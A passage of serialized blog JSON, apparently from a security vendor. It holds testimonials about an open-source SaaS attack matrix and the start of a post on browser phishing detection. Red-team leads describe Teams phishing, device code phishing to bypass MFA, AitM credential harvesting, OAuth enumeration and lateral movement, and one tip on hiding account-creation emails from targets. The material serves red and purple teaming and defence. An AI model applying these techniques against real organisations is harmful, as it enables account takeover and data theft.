abuse",{"data":197674,"marks":197675,"value":2936,"nodeType":173},{},[],{"data":197677,"content":197678,"nodeType":186},{"uri":144083},[197679],{"data":197680,"marks":197681,"value":144086,"nodeType":173},{},[197682],{"type":194},{"data":197684,"marks":197685,"value":2936,"nodeType":173},{},[],{"data":197687,"content":197689,"nodeType":186},{"uri":197688},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/oauth_tokens/description.md",[197690],{"data":197691,"marks":197692,"value":197694,"nodeType":173},{},[197693],{"type":194},"OAuth tokens",{"data":197696,"marks":197697,"value":2936,"nodeType":173},{},[],{"data":197699,"content":197700,"nodeType":186},{"uri":59347},[197701],{"data":197702,"marks":197703,"value":59350,"nodeType":173},{},[197704],{"type":194},{"data":197706,"marks":197707,"value":197708,"nodeType":173},{},[]," (as long as you ensure the target isn't notified – make sure you delete the notification of creation email!), ",{"data":197710,"content":197712,"nodeType":186},{"uri":197711},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/api_secret_theft/description.md",[197713],{"data":197714,"marks":197715,"value":197717,"nodeType":173},{},[197716],{"type":194},"API secret theft",{"data":197719,"marks":197720,"value":9534,"nodeType":173},{},[],{"data":197722,"content":197723,"nodeType":186},{"uri":162296},[197724],{"data":197725,"marks":197726,"value":197728,"nodeType":173},{},[197727],{"type":194},"link backdooring",{"data":197730,"marks":197731,"value":197,"nodeType":173},{},[],{"data":197733,"content":197734,"nodeType":178},{},[197735],{"data":197736,"marks":197737,"value":197738,"nodeType":173},{},[],"Embracing the modern Zero Trust architecture with its greater SaaS usage does not come without security risks, and while it does invalidate a large number of the attacks that can be performed within an AD environment, the SaaS attack matrix is a great way of illustrating how these attacks work, as well as helping red and blue teams respectively to simulate and defend against them.\" ",{"data":197740,"content":197741,"nodeType":231},{},[],{"data":197743,"content":197744,"nodeType":235},{},[197745],{"data":197746,"marks":197747,"value":197748,"nodeType":173},{},[],"Tom Ellson | Head of Offensive Security | Stripe OLT",{"data":197750,"content":197751,"nodeType":178},{},[197752],{"data":197753,"marks":197754,"value":197755,"nodeType":173},{},[],"“We've used the SaaS attack matrix across several cloud-native engagements, for both initial access and lateral movement. My go-to techniques so far have been:",{"data":197757,"content":197758,"nodeType":250},{},[197759,197786,197808,197830],{"data":197760,"content":197761,"nodeType":254},{},[197762],{"data":197763,"content":197764,"nodeType":178},{},[197765,197768,197778,197782],{"data":197766,"marks":197767,"value":37,"nodeType":173},{},[],{"data":197769,"content":197771,"nodeType":186},{"uri":197770},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/im_phishing/description.md",[197772],{"data":197773,"marks":197774,"value":197777,"nodeType":173},{},[197775,197776],{"type":194},{"type":370},"IM phishing:",{"data":197779,"marks":197780,"value":3107,"nodeType":173},{},[197781],{"type":370},{"data":197783,"marks":197784,"value":197785,"nodeType":173},{},[],"Phishing via Microsoft Teams in particular has been highly successful, especially when paired with a number of abusable “features” (working as intended, clearly). ",{"data":197787,"content":197788,"nodeType":254},{},[197789],{"data":197790,"content":197791,"nodeType":178},{},[197792,197795,197804],{"data":197793,"marks":197794,"value":37,"nodeType":173},{},[],{"data":197796,"content":197797,"nodeType":186},{"uri":9275},[197798],{"data":197799,"marks":197800,"value":197803,"nodeType":173},{},[197801,197802],{"type":194},{"type":370},"Device code phishing:",{"data":197805,"marks":197806,"value":197807,"nodeType":173},{},[]," We use this for both initial access and persistence. It’s a great way of getting around MFA by tricking the victim into following the device approval process for our device, but using their device. ",{"data":197809,"content":197810,"nodeType":254},{},[197811],{"data":197812,"content":197813,"nodeType":178},{},[197814,197817,197826],{"data":197815,"marks":197816,"value":37,"nodeType":173},{},[],{"data":197818,"content":197819,"nodeType":186},{"uri":114964},[197820],{"data":197821,"marks":197822,"value":197825,"nodeType":173},{},[197823,197824],{"type":194},{"type":370},"AitM phishing:",{"data":197827,"marks":197828,"value":197829,"nodeType":173},{},[]," This is now a staple for credential harvesting. Better security controls force us to abuse other avenues to bypass conditional access policies, such as extraction of the PRT token from the end user device, thus granting us claimed access, which can be achieved using AitM and BitM techniques.",{"data":197831,"content":197832,"nodeType":254},{},[197833],{"data":197834,"content":197835,"nodeType":178},{},[197836,197839,197849,197853],{"data":197837,"marks":197838,"value":37,"nodeType":173},{},[],{"data":197840,"content":197842,"nodeType":186},{"uri":197841},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/oauth_token_enumeration/description.md",[197843],{"data":197844,"marks":197845,"value":197848,"nodeType":173},{},[197846,197847],{"type":194},{"type":370},"OAuth token enumeration:",{"data":197850,"marks":197851,"value":3107,"nodeType":173},{},[197852],{"type":370},{"data":197854,"marks":197855,"value":197856,"nodeType":173},{},[],"Once an account has been compromised, the Myapps portal is commonly used to validate the accessible applications and further target downstream apps to access data and functionality. ",{"data":197858,"content":197859,"nodeType":178},{},[197860],{"data":197861,"marks":197862,"value":197863,"nodeType":173},{},[],"We’re usually targeting M365 environments but have still found these attack techniques to be highly effective. In some cases, we’ve leveraged other SaaS applications such as abusing in-app phishing via GitHub to compromise development pipelines. The matrix is particularly useful as a playbook of further attacks once initial access has been established. Even just the awareness of how to pivot from SaaS to SaaS (and sometimes back to Microsoft or Google) is really eye-opening for red teams, and adds a new dimension to the security testing that our clients are used to experiencing. ",{"data":197865,"content":197866,"nodeType":178},{},[197867],{"data":197868,"marks":197869,"value":197870,"nodeType":173},{},[],"Because of the success of using these methods, we’ve now incorporated the SaaS attack matrix techniques into our purple teaming methodology to ensure that our clients can build awareness of their detection visibility gaps when it comes to identity attacks, and are routinely benchmarked against them.”  ",{"data":197872,"content":197873,"nodeType":231},{},[],{"data":197875,"content":197876,"nodeType":235},{},[197877],{"data":197878,"marks":197879,"value":197880,"nodeType":173},{},[],"Max Corbridge | Head of Adversarial Simulation | JUMPSEC",{"data":197882,"content":197883,"nodeType":178},{},[197884],{"data":197885,"marks":197886,"value":197887,"nodeType":173},{},[],"“I’ve been a big fan of the matrix from day one. We use it for two main purposes – as a catalog of TTPs to apply during threat modeling exercises with cloud-native clients, and as a guide for how to apply novel TTPs to different apps and situations. The wiki descriptions, video demonstrations and references help enormously with this. ",{"data":197889,"content":197890,"nodeType":178},{},[197891,197895,197902,197905,197912,197915,197924,197927,197934],{"data":197892,"marks":197893,"value":197894,"nodeType":173},{},[],"We’ve mostly relied on ",{"data":197896,"content":197897,"nodeType":186},{"uri":197770},[197898],{"data":197899,"marks":197900,"value":181463,"nodeType":173},{},[197901],{"type":194},{"data":197903,"marks":197904,"value":2936,"nodeType":173},{},[],{"data":197906,"content":197907,"nodeType":186},{"uri":114964},[197908],{"data":197909,"marks":197910,"value":197060,"nodeType":173},{},[197911],{"type":194},{"data":197913,"marks":197914,"value":2936,"nodeType":173},{},[],{"data":197916,"content":197918,"nodeType":186},{"uri":197917},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/abuse_existing_oauth_integrations/description.md",[197919],{"data":197920,"marks":197921,"value":197923,"nodeType":173},{},[197922],{"type":194},"abusing OAuth integrations",{"data":197925,"marks":197926,"value":9534,"nodeType":173},{},[],{"data":197928,"content":197929,"nodeType":186},{"uri":63250},[197930],{"data":197931,"marks":197932,"value":63256,"nodeType":173},{},[197933],{"type":194},{"data":197935,"marks":197936,"value":197937,"nodeType":173},{},[],". In one recent engagement, we were able to compromise a cloud identity with limited permissions in the target Azure environment. We were able to enumerate additional OAuth integrations to laterally move to a third-party IT Service Management SaaS application, which presented a much easier target to elevate privileges. We actually ended up finding a number of 0-days in the application, which we then used as a trusted platform to launch a covert spear-phishing campaign against specific high-privilege users, communicating back-and-forth as though we were a genuine support team, and hiding risky changes to cover our tracks. Ultimately we were able to pivot back into the target Azure estate, but now with administrative privileges. ",{"data":197939,"content":197940,"nodeType":178},{},[197941],{"data":197942,"marks":197943,"value":197944,"nodeType":173},{},[],"This really shows how third-party identities and apps are often the soft underbelly for a lot of otherwise pretty secure orgs that we work with, and we’re enjoying the challenge of finding new ways of getting to the crown jewels. ",{"data":197946,"content":197947,"nodeType":178},{},[197948],{"data":197949,"marks":197950,"value":197951,"nodeType":173},{},[],"In my eyes the world of cloud and SaaS-native attack techniques is under-researched for how increasingly relevant it is becoming. Many of the older TTPs and tradecraft are no longer relevant in a cloud-native world, and even when the techniques are consistent with the ways we used to target networks and endpoints, the context and how it actually works is completely different. So, resources like the SaaS attack matrix will continue to be needed for both offensive and defensive security practitioners going forwards”.",{"data":197953,"content":197954,"nodeType":231},{},[],{"data":197956,"content":197957,"nodeType":169},{},[197958],{"data":197959,"marks":197960,"value":88728,"nodeType":173},{},[],{"data":197962,"content":197963,"nodeType":178},{},[197964],{"data":197965,"marks":197966,"value":197967,"nodeType":173},{},[],"Hopefully you're now feeling inspired to get involved and start applying the SaaS attack matrix yourself. And if you’ve been using the matrix and want to share your experience with us, we’d love to hear from you. ",{"data":197969,"content":197970,"nodeType":178},{},[197971,197975,197983],{"data":197972,"marks":197973,"value":197974,"nodeType":173},{},[],"We hope to see your comments, discussions, or PRs on ",{"data":197976,"content":197977,"nodeType":186},{"uri":88239},[197978],{"data":197979,"marks":197980,"value":197982,"nodeType":173},{},[197981],{"type":194},"GitHub",{"data":197984,"marks":197985,"value":197986,"nodeType":173},{},[],"!",{"data":197988,"content":197989,"nodeType":178},{},[197990,197994,198003],{"data":197991,"marks":197992,"value":197993,"nodeType":173},{},[],"If this has piqued your interest, we’ve just released a 2024 edition of our SaaS attacks report: ",{"data":197995,"content":197997,"nodeType":186},{"uri":197996},"https://pushsecurity.com/resources/book/saas-attacks-report/",[197998],{"data":197999,"marks":198000,"value":198002,"nodeType":173},{},[198001],{"type":194},"get your copy here",{"data":198004,"marks":198005,"value":197,"nodeType":173},{},[],{"data":198007,"content":198011,"nodeType":312},{"target":198008},{"sys":198009},{"id":198010,"type":317,"linkType":318},"J11G6XCdDAYu0GQbKGCnm",[],{"data":198013,"content":198014,"nodeType":178},{},[198015],{"data":198016,"marks":198017,"value":37,"nodeType":173},{},[],"The SaaS attack matrix: A year in review","It’s been almost exactly a year since we released our open source repository of SaaS-native attack techniques. Let's reflect on what’s changed. ","2024-08-27T00:00:00.000Z","the-saas-attack-matrix-one-year-on",{"items":198023},[198024,198026],{"sys":198025,"name":505},{"id":504},{"sys":198027,"name":509},{"id":508},{"items":198029},[198030],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":198031},{"url":1496},"content:blog:shifting-detection-left-for-more-effective-threat-detection.json","blog/shifting-detection-left-for-more-effective-threat-detection.json","blog/shifting-detection-left-for-more-effective-threat-detection",{"_path":198036,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":198037,"ogImage":118,"summary":198039,"title":496,"subtitle":118,"metaTitle":198064,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":198065,"authorsCollection":198071,"content":198075,"relatedBlogPostsCollection":198366,"_id":200047,"_type":5439,"_source":5440,"_file":200048,"_stem":200049,"_extension":5439},"/blog/detecting-and-blocking-phishing-attacks-in-the-browser",{"id":162,"publishedAt":198038},"2026-01-30T09:17:34.256Z",{"json":198040},{"data":198041,"content":198042,"nodeType":165},{},[198043,198050,198057],{"data":198044,"content":198045,"nodeType":178},{},[198046],{"data":198047,"marks":198048,"value":198049,"nodeType":173},{},[],"It takes less than two minutes to explain how Push detects and blocks phishing attempts in the browser. ",{"data":198051,"content":198052,"nodeType":178},{},[198053],{"data":198054,"marks":198055,"value":198056,"nodeType":173},{},[],"Do you know what also takes less than two minutes? ",{"data":198058,"content":198059,"nodeType":178},{},[198060],{"data":198061,"marks":198062,"value":198063,"nodeType":173},{},[],"Actually enabling Push’s phishing detection and blocking controls for all your employees! ","How Push detects and blocks phishing attacks in the browser",{"items":198066},[198067,198069],{"sys":198068,"name":505},{"id":504},{"sys":198070,"name":509},{"id":508},{"items":198072},[198073],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":198074},{"url":516},{"json":198076,"links":198349},{"nodeType":165,"data":198077,"content":198078},{},[198079,198085,198101,198114,198120,198126,198129,198135,198141,198189,198195,198200,198203,198209,198215,198221,198227,198233,198247,198252,198258,198264,198278,198283,198289,198295,198301,198307,198313,198316,198322,198338,198343],{"nodeType":169,"data":198080,"content":198081},{},[198082],{"nodeType":173,"value":174,"marks":198083,"data":198084},[],{},{"nodeType":178,"data":198086,"content":198087},{},[198088,198091,198098],{"nodeType":173,"value":182,"marks":198089,"data":198090},[],{},{"nodeType":186,"data":198092,"content":198093},{"uri":188},[198094],{"nodeType":173,"value":191,"marks":198095,"data":198097},[198096],{"type":194},{},{"nodeType":173,"value":197,"marks":198099,"data":198100},[],{},{"nodeType":178,"data":198102,"content":198103},{},[198104,198107,198111],{"nodeType":173,"value":204,"marks":198105,"data":198106},[],{},{"nodeType":173,"value":208,"marks":198108,"data":198110},[198109],{"type":194},{},{"nodeType":173,"value":213,"marks":198112,"data":198113},[],{},{"nodeType":178,"data":198115,"content":198116},{},[198117],{"nodeType":173,"value":220,"marks":198118,"data":198119},[],{},{"nodeType":178,"data":198121,"content":198122},{},[198123],{"nodeType":173,"value":227,"marks":198124,"data":198125},[],{},{"nodeType":231,"data":198127,"content":198128},{},[],{"nodeType":235,"data":198130,"content":198131},{},[198132],{"nodeType":173,"value":239,"marks":198133,"data":198134},[],{},{"nodeType":178,"data":198136,"content":198137},{},[198138],{"nodeType":173,"value":246,"marks":198139,"data":198140},[],{},{"nodeType":250,"data":198142,"content":198143},{},[198144,198153,198162,198171,198180],{"nodeType":254,"data":198145,"content":198146},{},[198147],{"nodeType":178,"data":198148,"content":198149},{},[198150],{"nodeType":173,"value":261,"marks":198151,"data":198152},[],{},{"nodeType":254,"data":198154,"content":198155},{},[198156],{"nodeType":178,"data":198157,"content":198158},{},[198159],{"nodeType":173,"value":271,"marks":198160,"data":198161},[],{},{"nodeType":254,"data":198163,"content":198164},{},[198165],{"nodeType":178,"data":198166,"content":198167},{},[198168],{"nodeType":173,"value":281,"marks":198169,"data":198170},[],{},{"nodeType":254,"data":198172,"content":198173},{},[198174],{"nodeType":178,"data":198175,"content":198176},{},[198177],{"nodeType":173,"value":291,"marks":198178,"data":198179},[],{},{"nodeType":254,"data":198181,"content":198182},{},[198183],{"nodeType":178,"data":198184,"content":198185},{},[198186],{"nodeType":173,"value":301,"marks":198187,"data":198188},[],{},{"nodeType":178,"data":198190,"content":198191},{},[198192],{"nodeType":173,"value":308,"marks":198193,"data":198194},[],{},{"nodeType":312,"data":198196,"content":198199},{"target":198197},{"sys":198198},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":198201,"content":198202},{},[],{"nodeType":235,"data":198204,"content":198205},{},[198206],{"nodeType":173,"value":327,"marks":198207,"data":198208},[],{},{"nodeType":178,"data":198210,"content":198211},{},[198212],{"nodeType":173,"value":334,"marks":198213,"data":198214},[],{},{"nodeType":178,"data":198216,"content":198217},{},[198218],{"nodeType":173,"value":341,"marks":198219,"data":198220},[],{},{"nodeType":178,"data":198222,"content":198223},{},[198224],{"nodeType":173,"value":348,"marks":198225,"data":198226},[],{},{"nodeType":178,"data":198228,"content":198229},{},[198230],{"nodeType":173,"value":355,"marks":198231,"data":198232},[],{},{"nodeType":235,"data":198234,"content":198235},{},[198236,198239,198244],{"nodeType":173,"value":362,"marks":198237,"data":198238},[],{},{"nodeType":173,"value":366,"marks":198240,"data":198243},[198241,198242],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":198245,"data":198246},[],{},{"nodeType":312,"data":198248,"content":198251},{"target":198249},{"sys":198250},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":198253,"content":198254},{},[198255],{"nodeType":173,"value":386,"marks":198256,"data":198257},[],{},{"nodeType":178,"data":198259,"content":198260},{},[198261],{"nodeType":173,"value":393,"marks":198262,"data":198263},[],{},{"nodeType":235,"data":198265,"content":198266},{},[198267,198270,198275],{"nodeType":173,"value":400,"marks":198268,"data":198269},[],{},{"nodeType":173,"value":404,"marks":198271,"data":198274},[198272,198273],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":198276,"data":198277},[],{},{"nodeType":312,"data":198279,"content":198282},{"target":198280},{"sys":198281},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":198284,"content":198285},{},[198286],{"nodeType":173,"value":423,"marks":198287,"data":198288},[],{},{"nodeType":178,"data":198290,"content":198291},{},[198292],{"nodeType":173,"value":430,"marks":198293,"data":198294},[],{},{"nodeType":178,"data":198296,"content":198297},{},[198298],{"nodeType":173,"value":437,"marks":198299,"data":198300},[],{},{"nodeType":178,"data":198302,"content":198303},{},[198304],{"nodeType":173,"value":444,"marks":198305,"data":198306},[],{},{"nodeType":178,"data":198308,"content":198309},{},[198310],{"nodeType":173,"value":451,"marks":198311,"data":198312},[],{},{"nodeType":231,"data":198314,"content":198315},{},[],{"nodeType":169,"data":198317,"content":198318},{},[198319],{"nodeType":173,"value":461,"marks":198320,"data":198321},[],{},{"nodeType":178,"data":198323,"content":198324},{},[198325,198328,198335],{"nodeType":173,"value":468,"marks":198326,"data":198327},[],{},{"nodeType":186,"data":198329,"content":198330},{"uri":473},[198331],{"nodeType":173,"value":476,"marks":198332,"data":198334},[198333],{"type":194},{},{"nodeType":173,"value":481,"marks":198336,"data":198337},[],{},{"nodeType":312,"data":198339,"content":198342},{"target":198340},{"sys":198341},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":198344,"content":198345},{},[198346],{"nodeType":173,"value":37,"marks":198347,"data":198348},[],{},{"entries":198350},{"hyperlink":198351,"inline":198352,"block":198353},[],[],[198354,198357,198360,198363],{"sys":198355,"__typename":15269,"type":15270,"ctaText":198356,"buttonLabel":15277,"buttonColour":72847,"buttonUrl":102966},{"id":316},"Scattered Spider have been observed using AiTM phish kits and detection evasion techniques in 2025. Learn about their TTP evolution in our new webinar.",{"sys":198358,"__typename":5345,"title":142445,"caption":142446,"layoutMode":118,"file":198359},{"id":380},{"url":142448,"width":132212,"height":132213},{"sys":198361,"__typename":5345,"title":142451,"caption":142452,"layoutMode":118,"file":198362},{"id":417},{"url":142454,"width":132212,"height":132213},{"sys":198364,"__typename":15269,"type":15270,"ctaText":198365,"buttonLabel":123357,"buttonColour":15273,"buttonUrl":74433},{"id":488},"Forget email or network controls — find out why the browser is best when it comes to detecting and blocking phishing attacks in real time.",{"items":198367},[198368,198940,199629],{"__typename":1528,"sys":198369,"content":198370,"title":98341,"synopsis":98342,"hashTags":118,"publishedDate":98343,"slug":98344,"tagsCollection":198930,"authorsCollection":198936},{"id":97694},{"json":198371},{"nodeType":165,"data":198372,"content":198373},{},[198374,198380,198386,198392,198395,198402,198408,198424,198454,198459,198475,198480,198500,198503,198510,198516,198529,198542,198547,198553,198559,198564,198577,198580,198587,198593,198599,198605,198611,198614,198621,198627,198633,198649,198655,198662,198701,198707,198712,198718,198723,198729,198732,198739,198752,198758,198792,198802,198805,198812,198818,198824,198854,198860,198877,198882,198887,198890,198897,198903,198919,198924],{"nodeType":178,"data":198375,"content":198376},{},[198377],{"nodeType":173,"value":97703,"marks":198378,"data":198379},[],{},{"nodeType":178,"data":198381,"content":198382},{},[198383],{"nodeType":173,"value":97710,"marks":198384,"data":198385},[],{},{"nodeType":178,"data":198387,"content":198388},{},[198389],{"nodeType":173,"value":97717,"marks":198390,"data":198391},[],{},{"nodeType":231,"data":198393,"content":198394},{},[],{"nodeType":169,"data":198396,"content":198397},{},[198398],{"nodeType":173,"value":97727,"marks":198399,"data":198401},[198400],{"type":370},{},{"nodeType":178,"data":198403,"content":198404},{},[198405],{"nodeType":173,"value":97735,"marks":198406,"data":198407},[],{},{"nodeType":178,"data":198409,"content":198410},{},[198411,198414,198421],{"nodeType":173,"value":97742,"marks":198412,"data":198413},[],{},{"nodeType":186,"data":198415,"content":198416},{"uri":97747},[198417],{"nodeType":173,"value":97750,"marks":198418,"data":198420},[198419],{"type":194},{},{"nodeType":173,"value":97755,"marks":198422,"data":198423},[],{},{"nodeType":250,"data":198425,"content":198426},{},[198427,198436,198445],{"nodeType":254,"data":198428,"content":198429},{},[198430],{"nodeType":178,"data":198431,"content":198432},{},[198433],{"nodeType":173,"value":97768,"marks":198434,"data":198435},[],{},{"nodeType":254,"data":198437,"content":198438},{},[198439],{"nodeType":178,"data":198440,"content":198441},{},[198442],{"nodeType":173,"value":97778,"marks":198443,"data":198444},[],{},{"nodeType":254,"data":198446,"content":198447},{},[198448],{"nodeType":178,"data":198449,"content":198450},{},[198451],{"nodeType":173,"value":97788,"marks":198452,"data":198453},[],{},{"nodeType":312,"data":198455,"content":198458},{"target":198456},{"sys":198457},{"id":97795,"type":317,"linkType":318},[],{"nodeType":178,"data":198460,"content":198461},{},[198462,198465,198472],{"nodeType":173,"value":97801,"marks":198463,"data":198464},[],{},{"nodeType":186,"data":198466,"content":198467},{"uri":97806},[198468],{"nodeType":173,"value":97809,"marks":198469,"data":198471},[198470],{"type":194},{},{"nodeType":173,"value":97814,"marks":198473,"data":198474},[],{},{"nodeType":312,"data":198476,"content":198479},{"target":198477},{"sys":198478},{"id":97821,"type":317,"linkType":318},[],{"nodeType":178,"data":198481,"content":198482},{},[198483,198486,198490,198493,198497],{"nodeType":173,"value":97827,"marks":198484,"data":198485},[],{},{"nodeType":173,"value":97831,"marks":198487,"data":198489},[198488],{"type":370},{},{"nodeType":173,"value":97836,"marks":198491,"data":198492},[],{},{"nodeType":173,"value":5440,"marks":198494,"data":198496},[198495],{"type":370},{},{"nodeType":173,"value":97844,"marks":198498,"data":198499},[],{},{"nodeType":231,"data":198501,"content":198502},{},[],{"nodeType":169,"data":198504,"content":198505},{},[198506],{"nodeType":173,"value":97854,"marks":198507,"data":198509},[198508],{"type":370},{},{"nodeType":178,"data":198511,"content":198512},{},[198513],{"nodeType":173,"value":97862,"marks":198514,"data":198515},[],{},{"nodeType":178,"data":198517,"content":198518},{},[198519,198522,198526],{"nodeType":173,"value":97869,"marks":198520,"data":198521},[],{},{"nodeType":173,"value":4821,"marks":198523,"data":198525},[198524],{"type":1646},{},{"nodeType":173,"value":97877,"marks":198527,"data":198528},[],{},{"nodeType":178,"data":198530,"content":198531},{},[198532,198535,198539],{"nodeType":173,"value":97884,"marks":198533,"data":198534},[],{},{"nodeType":173,"value":97888,"marks":198536,"data":198538},[198537],{"type":370},{},{"nodeType":173,"value":197,"marks":198540,"data":198541},[],{},{"nodeType":312,"data":198543,"content":198546},{"target":198544},{"sys":198545},{"id":97899,"type":317,"linkType":318},[],{"nodeType":178,"data":198548,"content":198549},{},[198550],{"nodeType":173,"value":97905,"marks":198551,"data":198552},[],{},{"nodeType":178,"data":198554,"content":198555},{},[198556],{"nodeType":173,"value":97912,"marks":198557,"data":198558},[],{},{"nodeType":312,"data":198560,"content":198563},{"target":198561},{"sys":198562},{"id":97919,"type":317,"linkType":318},[],{"nodeType":178,"data":198565,"content":198566},{},[198567,198570,198574],{"nodeType":173,"value":97925,"marks":198568,"data":198569},[],{},{"nodeType":173,"value":97929,"marks":198571,"data":198573},[198572],{"type":370},{},{"nodeType":173,"value":97934,"marks":198575,"data":198576},[],{},{"nodeType":231,"data":198578,"content":198579},{},[],{"nodeType":169,"data":198581,"content":198582},{},[198583],{"nodeType":173,"value":97944,"marks":198584,"data":198586},[198585],{"type":370},{},{"nodeType":178,"data":198588,"content":198589},{},[198590],{"nodeType":173,"value":97952,"marks":198591,"data":198592},[],{},{"nodeType":178,"data":198594,"content":198595},{},[198596],{"nodeType":173,"value":97959,"marks":198597,"data":198598},[],{},{"nodeType":178,"data":198600,"content":198601},{},[198602],{"nodeType":173,"value":97966,"marks":198603,"data":198604},[],{},{"nodeType":178,"data":198606,"content":198607},{},[198608],{"nodeType":173,"value":97973,"marks":198609,"data":198610},[],{},{"nodeType":231,"data":198612,"content":198613},{},[],{"nodeType":169,"data":198615,"content":198616},{},[198617],{"nodeType":173,"value":97983,"marks":198618,"data":198620},[198619],{"type":370},{},{"nodeType":178,"data":198622,"content":198623},{},[198624],{"nodeType":173,"value":97991,"marks":198625,"data":198626},[],{},{"nodeType":178,"data":198628,"content":198629},{},[198630],{"nodeType":173,"value":97998,"marks":198631,"data":198632},[],{},{"nodeType":178,"data":198634,"content":198635},{},[198636,198639,198646],{"nodeType":173,"value":98005,"marks":198637,"data":198638},[],{},{"nodeType":186,"data":198640,"content":198641},{"uri":98010},[198642],{"nodeType":173,"value":98013,"marks":198643,"data":198645},[198644],{"type":194},{},{"nodeType":173,"value":98018,"marks":198647,"data":198648},[],{},{"nodeType":178,"data":198650,"content":198651},{},[198652],{"nodeType":173,"value":98025,"marks":198653,"data":198654},[],{},{"nodeType":178,"data":198656,"content":198657},{},[198658],{"nodeType":173,"value":98032,"marks":198659,"data":198661},[198660],{"type":370},{},{"nodeType":250,"data":198663,"content":198664},{},[198665,198674,198683,198692],{"nodeType":254,"data":198666,"content":198667},{},[198668],{"nodeType":178,"data":198669,"content":198670},{},[198671],{"nodeType":173,"value":81804,"marks":198672,"data":198673},[],{},{"nodeType":254,"data":198675,"content":198676},{},[198677],{"nodeType":178,"data":198678,"content":198679},{},[198680],{"nodeType":173,"value":98055,"marks":198681,"data":198682},[],{},{"nodeType":254,"data":198684,"content":198685},{},[198686],{"nodeType":178,"data":198687,"content":198688},{},[198689],{"nodeType":173,"value":98065,"marks":198690,"data":198691},[],{},{"nodeType":254,"data":198693,"content":198694},{},[198695],{"nodeType":178,"data":198696,"content":198697},{},[198698],{"nodeType":173,"value":98075,"marks":198699,"data":198700},[],{},{"nodeType":178,"data":198702,"content":198703},{},[198704],{"nodeType":173,"value":98082,"marks":198705,"data":198706},[],{},{"nodeType":312,"data":198708,"content":198711},{"target":198709},{"sys":198710},{"id":98089,"type":317,"linkType":318},[],{"nodeType":178,"data":198713,"content":198714},{},[198715],{"nodeType":173,"value":98095,"marks":198716,"data":198717},[],{},{"nodeType":312,"data":198719,"content":198722},{"target":198720},{"sys":198721},{"id":98102,"type":317,"linkType":318},[],{"nodeType":178,"data":198724,"content":198725},{},[198726],{"nodeType":173,"value":98108,"marks":198727,"data":198728},[],{},{"nodeType":231,"data":198730,"content":198731},{},[],{"nodeType":169,"data":198733,"content":198734},{},[198735],{"nodeType":173,"value":98118,"marks":198736,"data":198738},[198737],{"type":370},{},{"nodeType":178,"data":198740,"content":198741},{},[198742,198745,198749],{"nodeType":173,"value":98126,"marks":198743,"data":198744},[],{},{"nodeType":173,"value":98130,"marks":198746,"data":198748},[198747],{"type":370},{},{"nodeType":173,"value":197,"marks":198750,"data":198751},[],{},{"nodeType":178,"data":198753,"content":198754},{},[198755],{"nodeType":173,"value":98141,"marks":198756,"data":198757},[],{},{"nodeType":178,"data":198759,"content":198760},{},[198761,198764,198768,198771,198775,198778,198782,198785,198789],{"nodeType":173,"value":98148,"marks":198762,"data":198763},[],{},{"nodeType":173,"value":98152,"marks":198765,"data":198767},[198766],{"type":370},{},{"nodeType":173,"value":98157,"marks":198769,"data":198770},[],{},{"nodeType":173,"value":98161,"marks":198772,"data":198774},[198773],{"type":370},{},{"nodeType":173,"value":98166,"marks":198776,"data":198777},[],{},{"nodeType":173,"value":98161,"marks":198779,"data":198781},[198780],{"type":370},{},{"nodeType":173,"value":98174,"marks":198783,"data":198784},[],{},{"nodeType":173,"value":98178,"marks":198786,"data":198788},[198787],{"type":370},{},{"nodeType":173,"value":98183,"marks":198790,"data":198791},[],{},{"nodeType":178,"data":198793,"content":198794},{},[198795,198798],{"nodeType":173,"value":98190,"marks":198796,"data":198797},[],{},{"nodeType":173,"value":98194,"marks":198799,"data":198801},[198800],{"type":370},{},{"nodeType":231,"data":198803,"content":198804},{},[],{"nodeType":169,"data":198806,"content":198807},{},[198808],{"nodeType":173,"value":98205,"marks":198809,"data":198811},[198810],{"type":370},{},{"nodeType":178,"data":198813,"content":198814},{},[198815],{"nodeType":173,"value":98213,"marks":198816,"data":198817},[],{},{"nodeType":178,"data":198819,"content":198820},{},[198821],{"nodeType":173,"value":98220,"marks":198822,"data":198823},[],{},{"nodeType":250,"data":198825,"content":198826},{},[198827,198836,198845],{"nodeType":254,"data":198828,"content":198829},{},[198830],{"nodeType":178,"data":198831,"content":198832},{},[198833],{"nodeType":173,"value":98233,"marks":198834,"data":198835},[],{},{"nodeType":254,"data":198837,"content":198838},{},[198839],{"nodeType":178,"data":198840,"content":198841},{},[198842],{"nodeType":173,"value":98243,"marks":198843,"data":198844},[],{},{"nodeType":254,"data":198846,"content":198847},{},[198848],{"nodeType":178,"data":198849,"content":198850},{},[198851],{"nodeType":173,"value":98253,"marks":198852,"data":198853},[],{},{"nodeType":178,"data":198855,"content":198856},{},[198857],{"nodeType":173,"value":98260,"marks":198858,"data":198859},[],{},{"nodeType":178,"data":198861,"content":198862},{},[198863,198867,198874],{"nodeType":173,"value":98267,"marks":198864,"data":198866},[198865],{"type":370},{},{"nodeType":186,"data":198868,"content":198869},{"uri":98273},[198870],{"nodeType":173,"value":98276,"marks":198871,"data":198873},[198872],{"type":194},{},{"nodeType":173,"value":37,"marks":198875,"data":198876},[],{},{"nodeType":312,"data":198878,"content":198881},{"target":198879},{"sys":198880},{"id":98287,"type":317,"linkType":318},[],{"nodeType":312,"data":198883,"content":198886},{"target":198884},{"sys":198885},{"id":98293,"type":317,"linkType":318},[],{"nodeType":231,"data":198888,"content":198889},{},[],{"nodeType":169,"data":198891,"content":198892},{},[198893],{"nodeType":173,"value":18605,"marks":198894,"data":198896},[198895],{"type":370},{},{"nodeType":178,"data":198898,"content":198899},{},[198900],{"nodeType":173,"value":98309,"marks":198901,"data":198902},[],{},{"nodeType":178,"data":198904,"content":198905},{},[198906,198909,198916],{"nodeType":173,"value":61741,"marks":198907,"data":198908},[],{},{"nodeType":186,"data":198910,"content":198911},{"uri":98320},[198